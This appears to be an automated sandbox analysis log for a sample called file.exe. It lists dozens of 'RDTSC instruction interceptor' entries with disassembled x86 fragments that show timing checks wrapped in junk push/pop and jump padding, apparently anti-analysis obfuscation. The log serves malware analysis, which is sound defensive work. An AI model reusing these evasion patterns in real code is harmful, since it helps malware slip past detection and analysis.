Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113ABF5 second address: 113AC0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FF249520A26h 0x00000009 jo 00007FF249520A26h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113AD72 second address: 113AD76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113AD76 second address: 113AD7C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113AD7C second address: 113AD98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FF248D5349Ch 0x0000000c js 00007FF248D53496h 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 pushad 0x00000016 popad 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113AD98 second address: 113ADA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FF249520A26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114153B second address: 114153F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11416AD second address: 11416B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FF249520A26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11416B7 second address: 11416EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF248D534A2h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FF248D534A9h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11416EC second address: 11416F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F0998 second address: 10F0A1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007FF248D53498h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 jmp 00007FF248D534A2h 0x00000028 mov ebx, dword ptr [ebp+12484978h] 0x0000002e mov edi, dword ptr [ebp+12455700h] 0x00000034 add eax, ebx 0x00000036 xor ch, 00000039h 0x00000039 je 00007FF248D534AAh 0x0000003f jmp 00007FF248D534A4h 0x00000044 push eax 0x00000045 push eax 0x00000046 jl 00007FF248D5349Ch 0x0000004c pop eax 0x0000004d mov dword ptr [esp], eax 0x00000050 mov ecx, dword ptr [ebp+122D20CDh] 0x00000056 push 00000004h 0x00000058 push eax 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c push esi 0x0000005d pop esi 0x0000005e pushad 0x0000005f popad 0x00000060 popad 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F0A1E second address: 10F0A28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FF249520A26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F0A28 second address: 10F0A2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1141EE9 second address: 1141EF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1141EF2 second address: 1141F0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF248D534A8h 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1141F0F second address: 1141F28 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF249520A2Ch 0x00000008 jng 00007FF249520A26h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jng 00007FF249520A26h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1141F28 second address: 1141F32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1141F32 second address: 1141F49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF249520A33h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1141F49 second address: 1141F4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1141F4D second address: 1141F5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1145114 second address: 114511E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1145751 second address: 1145755 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1145755 second address: 114575D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114B79E second address: 114B7A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114B7A3 second address: 114B7AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114B944 second address: 114B954 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114BAB4 second address: 114BAE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF248D534A1h 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e jmp 00007FF248D534A3h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114BAE1 second address: 114BAE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114BAE7 second address: 114BAFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FF248D53498h 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114BD7A second address: 114BD7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114C06F second address: 114C08B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007FF248D53498h 0x0000000e pushad 0x0000000f popad 0x00000010 jo 00007FF248D5349Ch 0x00000016 ja 00007FF248D53496h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114C38A second address: 114C3AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF249520A2Dh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF249520A2Ah 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114CBF4 second address: 114CC1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FF248D53496h 0x0000000a jmp 00007FF248D5349Ch 0x0000000f jmp 00007FF248D534A0h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114CC1F second address: 114CC2F instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF249520A26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114D2AC second address: 114D2E5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007FF248D534A2h 0x0000000e jnp 00007FF248D53496h 0x00000014 jng 00007FF248D53496h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FF248D534A4h 0x00000022 pushad 0x00000023 push ecx 0x00000024 pop ecx 0x00000025 push eax 0x00000026 pop eax 0x00000027 push esi 0x00000028 pop esi 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114D2E5 second address: 114D2F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FF249520A26h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114D5A3 second address: 114D5C0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FF248D5349Ch 0x0000000c push esi 0x0000000d pop esi 0x0000000e jne 00007FF248D53496h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114D5C0 second address: 114D5CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007FF249520A26h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114D5CF second address: 114D5D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114D5D3 second address: 114D5E5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF249520A26h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114D5E5 second address: 114D5EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114D5EB second address: 114D5F9 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF249520A26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1155A42 second address: 1155A46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1154AE5 second address: 1154AEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1154F39 second address: 1154F43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FF248D53496h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11550CF second address: 11550D9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF249520A26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115543C second address: 1155465 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF248D5349Ah 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007FF248D534A3h 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11555D0 second address: 11555D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1157130 second address: 1157134 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1157134 second address: 115714B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FF249520A2Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115E8E6 second address: 115E8F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FF248D53496h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115E8F4 second address: 115E918 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF249520A38h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115D223 second address: 115D229 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115D7F7 second address: 115D836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007FF249520A3Dh 0x0000000b popad 0x0000000c jne 00007FF249520A47h 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007FF249520A31h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115C63F second address: 115C645 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115C645 second address: 115C65D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FF249520A30h 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1161B04 second address: 1161B08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11669BC second address: 11669D0 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF249520A26h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007FF249520A26h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11731DE second address: 1173208 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF248D534B4h 0x00000008 js 00007FF248D53496h 0x0000000e jmp 00007FF248D534A8h 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 pop edi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1172BB6 second address: 1172BC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007FF249520A26h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1172BC7 second address: 1172BCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1172BCD second address: 1172BE3 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF249520A26h 0x00000008 jp 00007FF249520A26h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1172BE3 second address: 1172BE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1172BE7 second address: 1172BF1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1172D5A second address: 1172D76 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FF248D534A6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117503A second address: 1175045 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF249520A26h 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1175045 second address: 117504E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push edi 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117504E second address: 1175064 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FF249520A2Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1174D93 second address: 1174DA1 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF248D53496h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1174DA1 second address: 1174DAB instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF249520A26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1174DAB second address: 1174DB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FF248D53496h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1174DB6 second address: 1174DBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1174DBC second address: 1174DC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117D73A second address: 117D742 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11849A3 second address: 11849A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11849A7 second address: 11849B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11849B1 second address: 11849BE instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF248D53496h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1184832 second address: 1184846 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF249520A2Ch 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1184846 second address: 118486B instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF248D53496h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jng 00007FF248D534AFh 0x00000010 jmp 00007FF248D534A3h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118FAAD second address: 118FAB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118FAB3 second address: 118FAB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118FAB9 second address: 118FAD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FF249520A2Fh 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118FAD0 second address: 118FB1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FF248D53496h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push ecx 0x0000000e jmp 00007FF248D5349Ch 0x00000013 push esi 0x00000014 pop esi 0x00000015 pop ecx 0x00000016 popad 0x00000017 push edi 0x00000018 jmp 00007FF248D534A0h 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FF248D534A6h 0x00000024 jg 00007FF248D53496h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118E5E7 second address: 118E5F5 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF249520A26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118E5F5 second address: 118E5F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118E5F9 second address: 118E5FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118E5FD second address: 118E636 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007FF248D534A2h 0x0000000c pop ebx 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007FF248D534A9h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118E636 second address: 118E652 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF249520A26h 0x00000008 jo 00007FF249520A26h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FF249520A2Ah 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118EEEB second address: 118EEF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118EEF1 second address: 118EF04 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF249520A26h 0x00000008 je 00007FF249520A26h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118EF04 second address: 118EF24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 pushad 0x00000007 je 00007FF248D534A4h 0x0000000d jmp 00007FF248D5349Eh 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118EF24 second address: 118EF2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118F81B second address: 118F81F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
